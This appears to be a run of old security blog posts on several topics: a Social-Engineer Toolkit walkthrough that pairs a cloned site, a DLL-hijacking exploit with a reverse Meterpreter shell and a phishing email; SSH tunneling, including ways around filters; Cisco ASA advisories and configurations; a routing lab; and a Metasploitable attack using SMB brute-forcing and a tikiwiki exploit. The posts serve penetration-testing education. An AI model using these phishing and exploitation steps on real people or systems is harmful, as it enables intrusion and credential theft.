I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one more DLLs from the share. Even if the file that the user opened is completely safe, a malicious DLL can be supplied that will lead to code execution.

HD Moore stated “While working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem.  iTunes was one of these applications and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The  Acros advisory on the 18th threw a wrench into this process.

Microsoft later release the following details  in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

• This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
• For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.

• The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.

Demo Time with SET… Thanks to Dave for his wonderful video that he posted this afternoon, I can now use this as my base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform. You can download the Social-Engineering Toolkit through subversion by simply typing this in Back|Track 4 or any other Linux OS.

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However BT4 now comes with SET located under /pentest/exploits/set, from here you can simply launch SET with a ./set and get your latest updates by selecting option 8.

SET can do tons of cool stuff and I have included a few links at the end of this post that explains them in details, and I have a few post to come that will also go into some more details. However for todays demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack4 you can find SET located under /pentest/exploits/set, you can launch it with ./set and as stated above select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected Option 2 or “Web Attack  Vectors” which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more “The Metasploit Browser Exploit Method” this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

And yet again select option 2, “Site Cloner” this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from, today we will be picking option 1 “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are giving several options, I choose option 2 “Windows Reverse_TCP Meterpreter“, this payload  will spawn a meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types if you are not certain select enter to choose the defaults, or find a semi-complete list over at exploitdb . At this point the malicious iframes are infected into the cloned website and awaits your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer,we are choosing option1 this option will allow you to send an email to one individual person. Once you are done you have to choose who you would like to send the phishing email too, and who is your sender lastly figure if you would like to use Gmail, your own mail server or some open relay server.

Next think of something clever as a email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates kindly click to verify you can access this test link. After you are finish click Ctrl + C and hit enter to complete this step. You will then receive a message stating that SET has already sent the email. Now is just a matter of waiting on your victim to click the email and check out the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, the  will be presented with the cloned site at first then the exploit will begin doing its thing in the background. Shortly after the user will be presented with a network share with the vulnerable files. After opening up the file  it  its Game Over.

Since the initial reporting of this issue, many researchers have came out with several ways of doing this so far some of my favorites are:

• Using msfconsole courtesy of the guys HDM in this post.
• Using msfpayload courtesy of Matt over at http://www.attackvector.org/alternative-dll-hijacking-method/
• Yet again Matt demoing using msfpayload + autorun usb stick  http://www.attackvector.org/autorun-dll-hijacker-usb-stick/

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file, however using the standard method I successful exploited both windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

• PCSC-lite vulnerability –> http://seclists.org/fulldisclosure/2010/Aug/71

A security issue affects the following Ubuntu releases:
– Ubuntu 9.04
– Ubuntu 9.10
– Ubuntu 10.04 LTS

• Brief Details :

It was discovered that the PC/SC service did not correctly handle  malformed messages. A local attacker could exploit this to execute
arbitrary code with root privileges. In short update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

• Ubuntu 9.10
  Ubuntu 10.04 LTS
• Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.
Segment Title: SSH tunneling for good or evil!

What is SSH –

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First be sure to install the most recent version as of yesterday OpenSSH version 5.6 is the most recent version.

sudo apt-get install ssh or configure from source

• Then do a quick test by trying to SSH into your own machine, SSH  localhost
• Then of course you can always edit the  /etc/ssh/sshd_config file and do things like force version 2, deny root login and sort.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network

Various types of tunneling protocols:

• HTTP
• ICMP
• DNS
• SSH

SSH tunneling how it works: Nice Youtube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

When can you use this?

• For good –> You can use this to create a Sock5 proxy to securely tunnel your web traffic for instance if you are at a free Wi-Fi hot spot.

• Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites
• Securely tunnel your IM chat or Email which you know by default are both clear text protocol

Examples:

Tunneling Gtalk traffic –>  ssh -f  user@myhomeserver.com -L 3000:talk.google.com:5222 home -N

Tunneling Email –>  ssh -f user@myhomeserver.com -L 2000:personal-server.com:25 -N

• For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling “as you would expect if tunneling is getting pass a firewall  in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and re-mediate.
  • In short  A vendor  of ours had a Linux based  appliance on the inside of our network in which the had a pre-configured  “stealthy reverse tunnel” that would give them access to that system at anytime without our assistance.

Reference Links

<https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell>

https://calomel.org/firefox_ssh_proxy.html

https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

I received notification of the following vulnerabilities outlined below via the full disclosure mail list but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organization depend on their Firewall as the primary means of protection against the many threats on the  internet.

The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

SunRPC Inspection Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

Transport Layer Security (TLS) Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

As a side note I would like to add that unless you are already running on version 8.3 you should disable the vulnerable services and take a moment to read the release note for version 8.3.

The are some syntax changes you have to adjust too, as well as do a full rule set conversion. Below is an example of an old rule and its recommended migrated counterpart. Some of the migrated rules and not all new since the were supported in older IOS version, however its now mandatory to do them the proper/recommended way instead of the older way.

Old Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Migrated Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 access-list 1 extended permit tcp any host 10.50.50.50 eq 80

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. I must also mention that the prefix is an EIGRP (D EX) route, which has an AD of 170 and an OSPF (O E2) route which has an AD of 110. In the first part of this article, I will go through the setup of the lab, which closely simulates the scenario I had and in the second part, will go through the actual remedy implemented that resulted in a “happy network”.

Let’s get to it.

First, let’s go through the topology. This lab contains 5 routers: R0 – R5 as follows:

R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

R1 = R0′s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

Please see Topology Diagram:

Administrative Distance Lab Topology

R0′s relevant configuration:

hostname R0
!
interface Loopback0
ip address 198.200.230.1 255.255.255.0
!
interface Loopback1
ip address 222.102.23.1 255.255.255.0
!
interface Loopback2
ip address 172.203.46.1 255.255.255.0
!
interface FastEthernet0/0
description FastE to R1
ip address 10.146.12.2 255.255.255.254
duplex auto
speed auto
!
router bgp 65000
no synchronization
bgp log-neighbor-changes
network 0.0.0.0
network 172.203.46.0 mask 255.255.255.0
network 198.200.230.0
network 222.102.23.0
neighbor R1-eBGP peer-group
neighbor R1-eBGP remote-as 65001
neighbor R1-eBGP route-map ROUTER-1-IN in
neighbor R1-eBGP route-map ROUTER-1-OUT out
neighbor 10.146.12.3 peer-group R1-eBGP
no auto-summary
!
ip route 0.0.0.0 0.0.0.0 Null0
!
ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
!
ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
!
route-map ROUTER-1-IN permit 10
match ip address prefix-list R1-IN
!
route-map ROUTER-1-OUT permit 10
match ip address prefix-list R1-OUT
!

R1′s relevant configuration:
hostname R1
!
ip address 172.32.27.1 255.255.255.0
!
interface Loopback1
ip address 172.25.240.1 255.255.255.0
!
interface FastEthernet0/0
description FastE to R0

ip address 10.146.12.4 255.255.255.254
ip nat inside
ip virtual-reassembly

duplex auto
speed auto
!
interface FastEthernet1/0
description FastE to R2

ip address 10.146.12.3 255.255.255.254
ip nat outside
ip virtual-reassembly

duplex auto
speed auto
!
router eigrp 200
redistribute bgp 65001 metric 1 1 1 1 1
network 10.146.12.4 0.0.0.0
network 172.25.240.1 0.0.0.0
no auto-summary
!
router bgp 65001
no synchronization
bgp log-neighbor-changes
network 172.32.27.0 mask 255.255.255.0
neighbor R0-eBGP peer-group
neighbor R0-eBGP remote-as 65000
neighbor R0-eBGP route-map ROUTER-0-OUT out
neighbor 10.146.12.2 peer-group R0-eBGP
no auto-summary
!
ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
ip nat inside source list 10 pool OVERLOAD overload
!
ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
!
access-list 10 deny 10.146.12.3
access-list 10 permit any
!
route-map ROUTER-0-OUT permit 10
match ip address prefix-list R0-OUT
!

Not too fancy either. Doing BGP to EIGRP redistribution and performing NAT on traffic sourcing from ACL 10. Since R1 is only advertising 172.32.27.0/24 to R0, without the NATing on R1, I wouldn’t be able to ping R0′s loopbacks from R4 for example.

R2′s relevant configuration:

hostname R2
! interface FastEthernet0/0
ip address 10.146.12.5 255.255.255.254
duplex auto
speed auto
!
interface FastEthernet1/0
ip address 172.19.200.1 255.255.255.0
duplex auto
speed auto
!
router eigrp 200
redistribute ospf 100 metric 1 1 1 1 1
network 10.146.12.5 0.0.0.0
no auto-summary
!
router ospf 100
router-id 172.19.200.1
log-adjacency-changes
network 172.19.200.1 0.0.0.0 area 0
network 172.25.196.1 0.0.0.0 area 0
default-information originate always
!
router rip
version 2
network 172.19.0.0
no auto-summary
!

Probably the simplest of all the configs, but this is the key router on which we’ll be going through the Administrative Distance (AD) exercise.   Not a lot to explain here either.  Redistributing OSPF into EIGRP, so that R1 knows of the subnets from R3/4 as well as the shared segment between R2/R3 and R4.

R3′s relavant configuration:


hostname R3
!
!
interface Loopback1
ip address 11.12.13.1 255.255.252.0
!
interface Loopback2
ip address 14.15.16.1 255.255.252.0
!
interface Loopback3
ip address 201.200.200.2 255.255.255.0
!
interface Loopback4
ip address 199.199.199.1 255.255.255.0
!
interface FastEthernet0/0
ip address 172.19.200.2 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.2
log-adjacency-changes
network 11.12.13.1 0.0.0.0 area 0
network 14.15.16.1 0.0.0.0 area 0
network 172.19.200.2 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
router rip
version 2
redistribute static
network 172.19.0.0
no auto-summary
!
ip route 222.102.23.0 255.255.255.0 Null0
!

!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
!

A few things to note here.  Although Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process.  Also note the static route to Null0;  This is a lab after all, instead of having a dummy host on the other side of an interface, I created the static to Null0 so I can have a “live” static route to play with (ie. “redistribute static” under rip)

R4′s relavant configuration:

hostname R4
!
interface Loopback1
ip address 199.20.46.1 255.255.254.0
!
interface Loopback2
ip address 198.22.12.1 255.255.254.0
!
interface FastEthernet0/0
ip address 172.19.200.3 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.3
log-adjacency-changes
redistribute static subnets
network 172.19.200.3 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
ip route 198.200.230.0 255.255.255.0 Null0
!
!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0


A few things to note here. Much like R3, Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0;

Ok – Enough configuration.  Let’s look at some show command to verify that the network is up and running as we want and also point out the behavior that needs correcting – to be done in Part 2.


+++++++ R0

R0#sh ip bgp summary | b Neigh
Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i

Total number of prefixes 4
R0#sh ip bgp | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.32.27.0/24 10.146.12.3 0 0 65001 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i
R0#Total number of prefixes 1
R1#
R1#sh ip nat statistics
Total active translations: 0 (0 static, 0 dynamic; 0 extended)
Outside interfaces:
FastEthernet1/0
Inside interfaces:
FastEthernet0/0
Hits: 409 Misses: 8
CEF Translated packets: 181, CEF Punted packets: 16
Expired translations: 47
Dynamic mappings:
-- Inside Source
[Id: 1] access-list 10 pool OVERLOAD refcount 0
pool OVERLOAD: netmask 255.255.255.0
start 172.32.27.100 end 172.32.27.100
type generic, total addresses 1, allocated 0 (0%), misses 102
Appl doors: 0
Normal doors: 0
Queued Packets: 0
R1#

R2#sh ip route eigrp
172.203.0.0/24 is subnetted, 1 subnets
D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
172.25.0.0/24 is subnetted, 1 subnets
D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
172.32.0.0/24 is subnetted, 1 subnets
D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
R2#sh ip route ospf
O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
11.0.0.0/32 is subnetted, 1 subnets
O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
14.0.0.0/32 is subnetted, 1 subnets
O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
R2#sh ip route rip
R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
R2#

+++++++ R3

R3#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
R3#sh ip rip database
172.19.0.0/16 auto-summary
172.19.200.0/24 directly connected, FastEthernet0/0
222.102.23.0/24 auto-summary
222.102.23.0/24 redistributed
[1] via 0.0.0.0,
R3#

+++++++ R4

R4#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
R4#

Below are the relevant out put from R2, which shows that R2 is not using the EIGRP learned routes to 222.102.23.0/24 and 198.200.230.0/24, but is using the OSPF and RIP routes instead.   As mentioned earlier, the requirement for this scenario is that R2 uses the EIGRP routes originated from R0, since they are the primary source.  In Part 2, I’ll go through the configuration added on R2 to make that happen.  If you do have ideas flowing through your head, please feel free to post your comment.

Until Next Time (AJ)


R2#sh ip route 222.102.23.1
Routing entry for 222.102.23.0/24
Known via "rip", distance 120, metric 1
Redistributing via rip
Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
Routing Descriptor Blocks:
* 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
Route metric is 1, traffic share count is 1

R2#sh ip route 198.200.230.0
Routing entry for 198.200.230.0/24
Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
Redistributing via eigrp 200
Advertised by eigrp 200 metric 1 1 1 1 1
Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
Routing Descriptor Blocks:
* 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
Route metric is 20, traffic share count is 1

R2#sh ip eigrp topology 222.102.23.0/24
IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
Routing Descriptor Blocks:
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)

R2#sh ip eigrp topology 198.200.230.0/24
IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
Routing Descriptor Blocks:
172.19.200.3, from Redistributed, Send flag is 0x0
Composite metric is (2560000256/0), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 10 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 0
External data:
Originating router is 192.168.20.2 (this system)
AS number of route is 100
External protocol is OSPF, external metric is 20
Administrator tag is 0 (0x00000000)
10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
Composite metric is (2560002816/2560000256), Route is External
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 110 microseconds
Reliability is 1/255
Load is 1/255
Minimum MTU is 1
Hop count is 1
External data:
Originating router is 172.32.27.1
AS number of route is 65001
External protocol is BGP, external metric is 0
Administrator tag is 65000 (0x0000FDE8)
R2#

+++++++ R1
R1#sh ip route eigrp
172.19.0.0/24 is subnetted, 1 subnets
D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
11.0.0.0/32 is subnetted, 1 subnets
D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
14.0.0.0/32 is subnetted, 1 subnets
D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 172.32.27.0/24 0.0.0.0 0 32768 i


+++++++ R2

As a Network Admin you would soon realize after a few months of adding various  ACL rules there comes a time when you need to go back and consolidate those rules before it gets out of hand.

Now that most cloud providers are moving away from the traditional (80, 443) TCP ports and moving towards your none standard (8800, 3995) ports, your job as a Network admin requires you to now plan a bit more.

Normally if I got a call that a users is unable to access a certain web, I would first verify if its a “URL filtering issue” or a “Firewall” access issue. If I determined that its the latter, I would then write a typical ACL and grant the user access after the requested service has been test.

For instance if you receive a call about not being able to access a website X on port 5454, you can write a basic ACL rule:

access-list external_access extended permit tcp 192.168.10.5 255.255.255.0 69.196.224.24 255.255.255.0 eq 5454

Now the above rule would work just fine, but think about it if you recieve about 10-15 of those request a day, your firewall will be a mess after a while. The way to take care of this is by using Using Network Objects and Groups in a Rule.

Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or a AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

Below is how you would accomplish this if you reieved say three request  for web related access all on different ports:

======================================
Creating Object group and adding ports Cisco ASA Firewall
======================================

config t
object-group service External_Acess tcp
description Access to external websites
port-object eq 7778
port-object eq 5454
port-object eq 3322

object-group network External_Access_Users
description Access to external websites
network-object host 192.168.10.5
network-object host 192.168.10.7
network-object host 192.168.10.9

=======================================
Creating ACL and applying object group
========================================
access-list acl_inside remark ***** External  Websites Access *****
access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Acess

Now the next time you receive a request for external website access on a none standard port you simply add the port to the service group, and the Host IP to the network access group and you are set. Now that’s much more easy on the eyes to look at!

If you have another way of achieving the same outcome don’t hesitate to leave a comment, in the end its all about learning.

Back in late May I was preparing for a presentation and while trying to figure out if I should do a live demo or show screen-shots, I noticed a tweet from HDMoore announcing the release of “Metasploitable”.

According to the Metasploit blog, Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. Now you might ask yourself why is this important, who wants a system that is easily hackable? The answer is simple, if you are doing exploit development/pentesting or just want to practice your KungFU and need a platform to test on then Metasploitable is the answer.

In my case I needed to do a demo and instead of configuring a vulnerable system I simply downloaded the torrent, loaded it up into my VMware player and I was set to go. At first I was having a hard time finding people to seed the torrent, however after I visited the Pauldotcom IRC room and spoked with Mubix, a few minutes later I had about 20 people seeding.

You should read the entire blog posting to really get a feel for some of the things you can do with Metasploitable. Keeping with the theme from my last blog post “So easy, even A Script Kiddie can do it” I will attempt to attack this VM using simple but effective methods.

Step One “Nmap Scan”:

The first scan I ran was Nmap -A: Which Enables OS detection and Version detection, Script scanning and Traceroute. Once I got an idea what I was dealing with I then proceeded to run Nmap 192.168.126.128 –script=smb-brute.nse. The purpose of this script try to brute force the host and reports but any successful credentials. In this case those credentials were msfadmin/msfadmin and user/user.

Fig-1 Nmap –script=smb-brute.nse

Step two “Fast-Track Metasploit Autopwnage”:

Quoted from the Fast-Track  program page, Metasploit Autopwn is a feature within Metasploit that is rich with different options. Autopwn allows you to NMAP scan a host, and automatically run exploits against the open ports on the system. So to break it down in simplistic terms, a port scan is ran against multiple host or one target, once those ports have been identified, metasploit will pull what exploits it have for those open ports, it may be 0 it may be 30. Those exploits are then launched against the system you scanned. It’s really a brute force exploits, it doesn’t know what version is being run on the system it just blindly launches a ton of exploits at the system.

After running the exploit brute force against the metasploitable VM  I was able to successfully exploit the system and got a session, however I was not able to interact with this session. That being said I was 50% there, I now have a working exploit I can manually use with Metasploit and chose a payload of my liking to gain shell access.

Fig-2 Fast-Track menu, “choose option 2″

Fig-3 Fast-Track “successfully found an exploit”

Step three “Using Metasploit”:

At this stage we already have a working exploit that Fast-Track discovered above so its time to use that exploit and a payload of our choosing. I am using Back Track 4 final release since the idea is to use the simplest tools possible instead of installing and configuring anything, also my metsploitable IP address in this example is 192.168.126.128.

cd /pentest/exploit/framework3

msfconsole

msf > svn update

msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec

msf exploit (tikiwiki_graph_formula_exec) > set RHOST 192.168.126.128

msf exploit (tikiwiki_graph_formula_exec) > set RPORT 80

